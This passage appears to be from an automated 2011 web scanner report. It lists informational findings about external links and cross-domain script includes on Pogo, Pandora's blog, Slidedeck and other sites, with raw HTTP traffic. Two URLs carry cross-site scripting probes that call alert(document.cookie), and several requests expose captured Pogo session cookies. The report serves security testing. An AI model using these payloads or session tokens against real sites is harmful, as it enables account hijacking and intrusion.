Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:44:54 GMT
Server: Apache-Coyote/1.1
Content-Length: 26035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

               <script src="https://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=161990458"></iframe>
...[SNIP]...

16.79. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/action/pogo/signin.do?returnType=redr&returnValue=%2Fclub-pogo

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://connect.facebook.net/en_US/all.js
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=2138590683

Request

GET /action/pogo/signin.do?returnType=redr&returnValue=%2Fclub-pogo HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:44:56 GMT
Server: Apache-Coyote/1.1
Content-Length: 26036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

               <script src="https://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=2138590683"></iframe>
...[SNIP]...

16.80. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/action/pogo/signin.do?pageSection=footer_login&29ac9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0baf35176c0=1

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://connect.facebook.net/en_US/all.js
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=344635188

Request

GET /action/pogo/signin.do?pageSection=footer_login&29ac9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E0baf35176c0=1 HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: com.pogo.unid=6606480040153856; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; prod.JID=C0E6107E9294EBED951A4EC6E886F7B9.000257; s_pers=%20s_nr%3D1294537655360-New%7C1297129655360%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:47:33 GMT
Server: Apache-Coyote/1.1
Content-Length: 26232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

               <script src="https://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=344635188"></iframe>
...[SNIP]...

16.81. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/action/pogo/signin.do?pageSection=footer_login

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://connect.facebook.net/en_US/all.js
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1490365775

Request

GET /action/pogo/signin.do?pageSection=footer_login HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:54:19 GMT
Server: Apache-Coyote/1.1
Content-Length: 26162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</script>

               <script src="https://connect.facebook.net/en_US/all.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<li><a class="popup||800|600|yes|true" href="https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos" rel="nofollow">Terms of Service</a>
...[SNIP]...
</div>


           <iframe width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no" src="https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=1490365775"></iframe>
...[SNIP]...

16.82. https://www.pogo.com/surveys/surveysofferssubs.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/surveys/surveysofferssubs.do

Issue detail

The page was loaded from a URL containing a query string:

https://www.pogo.com/surveys/surveysofferssubs.do?emv=SOsub_test_heavy_2

The response contains the following links to other domains:

https://account.ea.com/legal/legal.jsp?locale=en_US&site=pogo&pageSection=footer_tos
https://fls.doubleclick.net/activityi;src=1494613;type=usfoo615;cat=usfoo777;ord=428182329

Request

GET /surveys/surveysofferssubs.do?emv=SOsub_test_heavy_2 HTTP/1.1
Host: www.pogo.com
Connection: keep-alive
Referer: https://www.pogo.com/action/pogop/heavyregview.do
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536583452-New%7C1297128583452%3B

Response

16.83. http://www.slidedeck.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.slidedeck.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.slidedeck.com/?ref=

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js?ver=1.4.4
http://feedproxy.google.com/~r/Slidedeck/~3/1cMMXgUgk7A/
http://feedproxy.google.com/~r/Slidedeck/~3/XBCXjyLwCdw/
http://feeds.feedburner.com/Slidedeck
http://gmpg.org/xfn/11
http://goo.gl/fb/G1nA4
http://goo.gl/fb/rDM8s
http://platform.twitter.com/widgets.js
http://twitter.com/share
http://twitter.com/slidedeck
http://www.dtelepathy.com/
http://www.dtelepathy.com/blog/telepathy/slidedeck-a-better-way-to-provide-content-on-the-web/
http://www.facebook.com/slidedeck
http://www.hellobar.com/
http://www.hellobar.com/hellobar.js
http://www.mediatemple.net/

Request

GET /?ref= HTTP/1.1
Host: www.slidedeck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:08:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 02 Jan 2011 03:08:07 GMT
Last-Modified: Sun, 09 Jan 2011 03:08:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.slidedeck.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
   <meta charset="
...[SNIP]...
</title>

<link rel="profile" href="http://gmpg.org/xfn/11" />

<link rel="stylesheet" type="text/css" media="all" href="http://www.slidedeck.com/wp-content/themes/slidedeck/style.css" />
...[SNIP]...
<link rel='stylesheet' id='avhec-widget-css' href='http://www.slidedeck.com/wp-content/plugins/extended-categories-widget/2.8/css/avh-ec.widget.css?ver=3.2.2' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js?ver=1.4.4'></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="//www.hellobar.com/hellobar.js"></script>
...[SNIP]...
<noscript>
The Hello Bar is a simple <a href="http://www.hellobar.com">web toolbar</a>
...[SNIP]...
<div id="tweetMeme" class="floatR noDownload">
                                       <a href="http://twitter.com/share" class="twitter-share-button" data-url="http://www.slidedeck.com" data-text="Check out SlideDeck - the perfect product for designing product tours & web presentations #jquery #wordpress #slider" data-count="horizontal" data-via="slidedeck" data-related="thehellobar:Our free toolbar. Grab everyone's attention!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</p>
   <a class="rss" href="http://feeds.feedburner.com/Slidedeck" target="_blank"><img src="http://www.slidedeck.com/wp-content/themes/slidedeck/images/icon_rss.png" alt="SlideDeck Blog RSS Feed" />
...[SNIP]...
<div class="post"><a href="http://feedproxy.google.com/~r/Slidedeck/~3/1cMMXgUgk7A/" rel="external nofollow">New Release: jQuery Library Bug Fixes & New WordPress Skin</a>
...[SNIP]...
<div class="post"><a href="http://feedproxy.google.com/~r/Slidedeck/~3/XBCXjyLwCdw/" rel="external nofollow">Customizing and Debugging SlideDeck with FireBug Part 1</a>
...[SNIP]...
</div>

<a href="http://feeds.feedburner.com/Slidedeck" rel="external nofollow" id="btn_show-more" class="cufon_futura">Show More</a>
...[SNIP]...
<div id="twitter-feed">
           <a href="http://twitter.com/slidedeck" target="_blank"><h3 class="cufon_futura">
...[SNIP]...
<div class="post">New Release: jQuery Library Bug Fixes & New WordPress Skin <a href="http://goo.gl/fb/G1nA4" rel="external">http://goo.gl/fb/G1nA4</a>
...[SNIP]...
<div class="post">Customizing and Debugging SlideDeck with FireBug Part 1 <a href="http://goo.gl/fb/rDM8s" rel="external">http://goo.gl/fb/rDM8s</a>
...[SNIP]...
</div>

<a href="http://twitter.com/slidedeck" rel="external nofollow" class="btn_show-more cufon_futura">Go To Twitter</a>
...[SNIP]...
<p><a rel="nofollow" href="http://www.dtelepathy.com/blog/telepathy/slidedeck-a-better-way-to-provide-content-on-the-web/" target="_blank"><em>
...[SNIP]...
<li><a class="twitter" href="http://twitter.com/slidedeck" target="_blank">Twitter</a>
...[SNIP]...
<li><a class="facebook" href="http://www.facebook.com/slidedeck" target="_blank">Facebook</a>
...[SNIP]...
<li><a class="rss" href="http://feeds.feedburner.com/Slidedeck" target="_blank">RSS</a>
...[SNIP]...
<p>SlideDeck ® is a registered trademark of <a href="http://www.dtelepathy.com" rel="external nofollow">digital-telepathy</a>
...[SNIP]...
<li id="menu-item-17" class="menu-item menu-item-type-custom menu-item-17"><a rel="external nofollow" href="http://www.mediatemple.net">Media Temple</a>
...[SNIP]...

17. Cross-domain script include previous next
There are 148 instances of this issue:

http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2
http://ad.doubleclick.net/adi/N3285.weather/B2343920.105
http://ad.doubleclick.net/adi/N3285.weather/B2343920.98
http://blog.pandora.com/faq/
http://blog.pandora.com/pandora/
http://blog.pandora.com/pandora/archives/arizona/
http://blog.pandora.com/pandora/archives/california/
http://blog.pandora.com/pandora/archives/colorado/
http://blog.pandora.com/pandora/archives/florida/
http://blog.pandora.com/pandora/archives/georgia/
http://blog.pandora.com/pandora/archives/illinois/
http://blog.pandora.com/pandora/archives/indiana/
http://blog.pandora.com/pandora/archives/louisiana/
http://blog.pandora.com/pandora/archives/maine/
http://blog.pandora.com/pandora/archives/maryland/
http://blog.pandora.com/pandora/archives/massachusetts/
http://blog.pandora.com/pandora/archives/michigan/
http://blog.pandora.com/pandora/archives/minnesota/
http://blog.pandora.com/pandora/archives/mississippi/
http://blog.pandora.com/pandora/archives/missouri/
http://blog.pandora.com/pandora/archives/nebraska/
http://blog.pandora.com/pandora/archives/new-jersey/
http://blog.pandora.com/pandora/archives/new-york/
http://blog.pandora.com/pandora/archives/north-carolina/
http://blog.pandora.com/pandora/archives/north-dakota/
http://blog.pandora.com/pandora/archives/ohio/
http://blog.pandora.com/pandora/archives/oregon/
http://blog.pandora.com/pandora/archives/other-states/
http://blog.pandora.com/pandora/archives/other_states/index.html
http://blog.pandora.com/pandora/archives/pennsylvania/
http://blog.pandora.com/pandora/archives/play-listen-repeat/
http://blog.pandora.com/pandora/archives/rhode-island/
http://blog.pandora.com/pandora/archives/roadtrip/
http://blog.pandora.com/pandora/archives/roadtrip/index.html
http://blog.pandora.com/pandora/archives/south-daktoa/
http://blog.pandora.com/pandora/archives/tennessee/
http://blog.pandora.com/pandora/archives/texas/
http://blog.pandora.com/pandora/archives/utah/
http://blog.pandora.com/pandora/archives/virginia/
http://blog.pandora.com/pandora/archives/washington-dc/
http://blog.pandora.com/pandora/archives/washington/
http://board-games.pogo.com/games/monopoly
http://dean.edwards.name/weblog/2006/06/again/
http://diythemes.com/thesis/
http://game3.pogo.com/error/java-problem.jsp
http://game3.pogo.com/exhibit/game/game.jsp
http://game3.pogo.com/exhibit/intermission.jsp
http://game3.pogo.com/exhibit/loading/loading.jsp
http://game3.pogo.com/exhibit/loading/loading.jsp
http://jqueryui.com/about
http://jqueryui.com/themeroller/
http://malsup.com/jquery/form/
http://online.wsj.com/article/SB10001424052748704415104576066830729058232.html
http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble
http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble
http://revver.com/video/426755/peanut-labs/
http://themeforest.net/user/freshface/portfolio
http://word-games.pogo.com/
http://wordpress.org/extend/plugins/wp-pagenavi/
http://www.adobe.com/special/offers.html
http://www.adobe.com/training/
http://www.bbc.co.uk/news/technology-12126880
http://www.e00.peanutlabs.com/js/iFrame/sc.php
http://www.ea.com/
http://www.ea.com/hasbro
http://www.ea.com/ipad
http://www.ea.com/iphone
http://www.ea.com/mobile
http://www.ea.com/platform/online-games
http://www.ea.com/platform/pc-games
http://www.ea.com/platform/ps3-games
http://www.ea.com/platform/xbox-360-games
http://www.ea.com/wii
http://www.facebook.com/
http://www.facebook.com/2008/fbml
http://www.facebook.com/Pogo
http://www.facebook.com/pages/Packet-Storm-Security/116613458352817
http://www.facebook.com/peanutlabs
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/xd_receiver_v0.4.php
http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-
http://www.freshnews.com/news/3881925a24d%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E29cb609e200/a
http://www.gamespot.com/
http://www.intellicast.com/
http://www.intellicast.com/Local/Weather.aspx
http://www.mlive.com/
http://www.pandora.com/
http://www.pandora.com/backstage
http://www.pandora.com/facebook/xd_receiver.htm
http://www.pandora.com/login.vm
http://www.pandora.com/people/
http://www.peanutlabs.com/js/iFrame/sc.php
http://www.pogo.com/
http://www.pogo.com/
http://www.pogo.com/
http://www.pogo.com/action/pogo/confirmation.do
http://www.pogo.com/action/pogo/lightregview.do
http://www.pogo.com/all-games
http://www.pogo.com/all-games
http://www.pogo.com/arcade-sports-games
http://www.pogo.com/arcade-sports-games
http://www.pogo.com/board-games
http://www.pogo.com/cash-games
http://www.pogo.com/games/scrabble
http://www.pogo.com/oberon/navheader.jsp
http://www.pogo.com/oberon/navheader.jsp
http://www.pogo.com/prize/prize.do
http://www.pogo.com/word-games
https://www.pogo.com/action/pogo/signin.do
https://www.pogo.com/action/pogop/heavyregview.do
https://www.pogo.com/surveys/processZipSubs.do
https://www.pogo.com/surveys/surveysofferssubs.do
https://www.pogo.com/surveys/surveysofferssubs.do
http://www.rockband.com/
http://www.slidedeck.com/
http://www.thedailynews.cc/
http://www.thedailynews.cc/siteimages/featurephoto/cleardot.gif
http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_1.jpg
http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_2.jpg
http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_3.jpg
http://www.thedailynews.cc/siteimages/featurephoto/tabs/Photo-NavigationBar_4.jpg
http://www.weather.com/
http://www.weather.com/weather/local/48617
http://www.weather.com/weather/local/48858
http://www.weather.com/weather/local/48879
http://www.weather.com/weather/local/USMI0020
http://www.xanga.com/
http://www1.peanutlabs.com/
http://www1.peanutlabs.com/4-tips-to-better-monetize-social-games-with-offers/
http://www1.peanutlabs.com/author/admin/
http://www1.peanutlabs.com/author/alex-dempsey/
http://www1.peanutlabs.com/become-a-publisher/
http://www1.peanutlabs.com/peanut-labs-acquired-by-e-rewards-silo-breaker/
http://www1.peanutlabs.com/peanut-labs-acquired-by-online-research-company-e-rewards-2/
http://www1.peanutlabs.com/peanut-labs-inc-announces-acquisition-by-e-rrewards-inc/
http://www1.peanutlabs.com/social-networking-survey-startup-peanut-labs-sold-to-e-rewards-paidcontent/
http://www1.peanutlabs.com/social-networking-survey-startup-peanut-labs-sold-to-e-rewards/
http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js
http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/10/
http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/11/
http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/2/
http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/3/
http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/4/
http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/5/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

17.1. http://ad.doubleclick.net/adi/N2998.Centro/B5116224.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.Centro/B5116224.2

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

17.2. http://ad.doubleclick.net/adi/N3285.weather/B2343920.105 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.weather/B2343920.105

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

17.3. http://ad.doubleclick.net/adi/N3285.weather/B2343920.98 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.weather/B2343920.98

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

Response

17.4. http://blog.pandora.com/faq/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/faq/

Issue detail

The response dynamically includes the following scripts from other domains:

http://secure-us.imrworldwide.com/v52.js
http://secure.quantserve.com/quant.js

Request

GET /faq/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:06:07 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 31 Dec 2010 02:15:09 GMT
ETag: "79e0e6-e543-498ab5f16c540"
Accept-Ranges: bytes
Content-Length: 58691
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

17.5. http://blog.pandora.com/pandora/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-us.imrworldwide.com/v52.js

Request

GET /pandora/ HTTP/1.1
Host: blog.pandora.com
